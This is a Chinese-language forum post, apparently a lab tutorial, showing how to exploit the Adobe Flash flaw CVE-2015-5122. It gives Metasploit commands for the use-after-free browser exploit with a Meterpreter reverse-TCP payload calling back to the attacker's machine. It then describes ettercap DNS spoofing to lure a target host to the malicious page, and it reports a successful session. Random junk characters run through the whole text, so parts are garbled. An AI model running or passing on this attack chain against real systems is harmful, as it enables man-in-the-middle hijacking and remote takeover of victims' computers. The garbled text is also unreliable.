- x5 ]$ {0 g: g% c- I 二、cve2015-5122漏洞实例演示虚拟机 ; j. p* u, s% W4 Q r: X$ [3 M/ g8 [
1 q. _2 h' N8 |( L; ?( M1 X5 B
6 J$ i2 B: ^) i9 b
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ( @% y N3 S; h# M) Z' c% ?
8 M! V* k% l3 s+ i& ~" J5 l
1 ~0 r6 b n5 v H" }; T. R search cve-2015-5122如图:
/ `% K) i9 I$ O1 J4 X : c0 N$ R1 c0 _2 {
# M) r R3 O3 l: H
) {! z/ i; M0 J. v9 I4 D3 z9 ]8 W
, \$ y c4 `1 S! F" t* L7 h& Q) }/ m# r u. s% \4 f4 j
下面我们敲如下命令:
3 I; V% N6 b. ?
{; N E$ @; A: _
' _% M. X; l2 I. x1 n/ r$ L use exploit/multi/browser/adobe_flash_opaque_background_uaf & u2 W& z$ [0 H# K& c4 Z
, `/ ^8 a9 u) O
' I, l% d# g2 U1 X3 j4 @
set PAYLOAD windows/meterpreter/reverse_tcp
, C, k8 `8 ` J, T, u- x " }2 m# l; f- @5 |
6 w" X m. a# p$ G; }! u# S+ @ set LHOST 192.168.0.109 # N% p8 k/ ]/ M' B7 ~
8 s7 N: m |7 b) a% `+ K4 V( [' P& Z6 E
set URIPATH / /*根目录*/
' s4 J9 D% A9 |. [- v
$ Y& C1 b: ]7 M" h) x
* H4 H9 q1 Z+ J" p- v/ }) d' \ set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 8 I3 p+ U M4 M- w0 j" m
2 @& \- c. s9 R I2 `' u8 @0 \4 b- l& [
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
7 N# a( w# K9 \" U: z
/ V3 ^5 d4 Q2 `+ l7 ~- J# w6 h0 f/ M+ @! f. i6 P
然后show options如图: 6 l3 [* e6 J! Y g, N; _0 R
; D0 U4 v$ {( D- m3 D" z8 g2 B( ]; y
J4 ?4 @5 V& ^ 1 r2 _. Y S7 q6 b
9 _8 w/ B" |$ _8 B/ I; S2 V
t6 h& o% k& U. K6 V 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: * D) w' T* T! U/ l% g( f
4 d. J8 k9 K% c; p% ?
0 O- \ q$ I% ^$ c. s/ a3 W
- B$ r, J$ C/ n! C. h 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
) Q& O1 y6 |- q. C) B1 F8 q+ } # T- Z$ {4 ]& A9 U, k
. }$ s2 ]3 D& v" j k
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
: e/ b( u; D+ T3 t. l" y: M+ ? " O3 l4 V2 l3 K* _2 }" j; O
1 U- y* @, D" Q9 q$ l % l" o5 M5 |2 ~' W8 K; e8 w7 t
* W5 T1 z7 k ~: R7 ~4 M$ i' ]* W$ p5 B, d
成功了,这时候我们断开ettercap,如图: : ?' C: t( t5 R p3 T1 J7 y& Y p
5 v; g- M$ K8 i2 ?& I* ~: B: {- b
) I$ e$ |- E5 v, b# n0 F
' Q2 M% N5 X J# r$ |- a+ ~: m" i+ ?7 i' o, q) X2 M% P% \2 t
Screenshot如图:
: k$ _) s4 }: s4 W+ v ( _% ]7 \9 J3 t3 b9 S
. z8 S0 G% Q3 T* L, s" T" Z7 H
, Y9 q# w6 N* i6 `( A& F/ K * I. c9 j" Y) z/ E! x: E. x. C
$ o( n% b- d* Y# f - x( n) Z& U+ G" r) r
|